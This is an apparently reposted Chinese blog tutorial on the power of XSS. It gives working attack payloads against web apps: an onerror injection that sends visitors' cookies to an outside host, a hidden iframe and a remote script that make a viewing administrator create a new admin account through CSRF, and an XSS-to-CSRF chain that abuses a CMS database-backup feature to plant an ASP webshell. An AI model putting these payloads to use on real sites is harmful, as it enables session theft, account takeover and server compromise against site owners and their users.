XSS的威力

朋友做了一件搞笑的事:挖了一个站的Csrf 0day,硬是带人家站加了友情链接。

 如今仍很多人没有意识到XSS的威力,他们会说,不就弹个窗么。那好吧,就弹个窗。

 Web2.0时代将是XSS的时代,各种XSS引发的淫荡招数将会越来越多,层出不穷,不信走着瞧。

例1 (php之术)

发视频处插如下代码

http://www.tudou.com/programs/view/TLpmMpTY0eY/"><img src=# οnerrοr='javascript:window.location.href="http://0kee.com/qq/0kee.php?cookie="+document.cookie'>  //读cookie转到php里,没啥好讲的

 

0kee.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

记得以前校内就有过类似事件,QQ最起码应该晓得过滤<>啊..晕

 

另一个例子(加管理员之术):

首先拥有一个自己可控的网站,然后构造表单:

将以上代码保存为1.asp(文件名随意),并将其上传到自己的可控网站下面,得到你自己的URL地址

在留言标题中插入:

<iframe src="http://www.stuhack.com/1.asp" width=0 height=0></iframe>

此漏洞可触发当管理员查看留言内容时直接添加管理员

例3 (略不同于例2,用的是js)

没过滤的部分插  <script src="http://127.0.0.1/1.js" </script>
然后等待管理员查看投稿的文章  (这个你可以社工他)  就会触发XSS攻击
远程JS里写  当然  内容限制长度是500 也可以不用调用远程直接写进去可以了

  1 varoReq = newActiveXObject("MSXML2.XMLHTTP");

2 varstr = "do_submit=1&newadmin[username]=thanks&newadmin[allowmultilogin]=1&newadmin[roleid]=1&newadmin[disabled]=0";

3 oReq.open("POST"," http://127.0.0.1/admin.php?file=admin&action=add",false ); //根据源码修改

4 oReq.setRequestHeader("Content-Length",str.length); 

5 oReq.setRequestHeader("CONTENT-TYPE","application/x-www-form-urlencoded");

6 oReq.send(str);

newadmin[username]=thanks  为会员注册账号    既可提升到管理员权限

 

例4(后台备份之术)

------GetShell-----
[1] 在Book.asp的邮箱处填写一句话,提交
[2] 在Book.asp的邮箱处填写XSS语句中的CSRF
[3] 等待管理员触发XSS语句,然后一句话连接bem.asp
[要求] 默认后台管理目录/数据库
[注意] 管理触发XSS是在后台查看留言

------ X S S -----

Book.asp
在邮箱里处写入XSS语句即可
用XSS调用CSRF,例如把CSRF去转成JS的则用
<SCRIPT SRC=http://521.im/xss.js></SCRIPT>

-----  CSRF  -----

<form method="post" action=" http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart ">
<input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly>
<input name="newdata" type="text" id="newdata" size="45" value="../bem.asp">
<input type="submit" name="Submit" value="开始备份" id="bem"/>
</form>
<script>
document.getElementByIdx_x('bem').click();
</script>


http://hi.baidu.com/thanks4sec/blog/item/dab3ed02ad92632db1351dfd.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值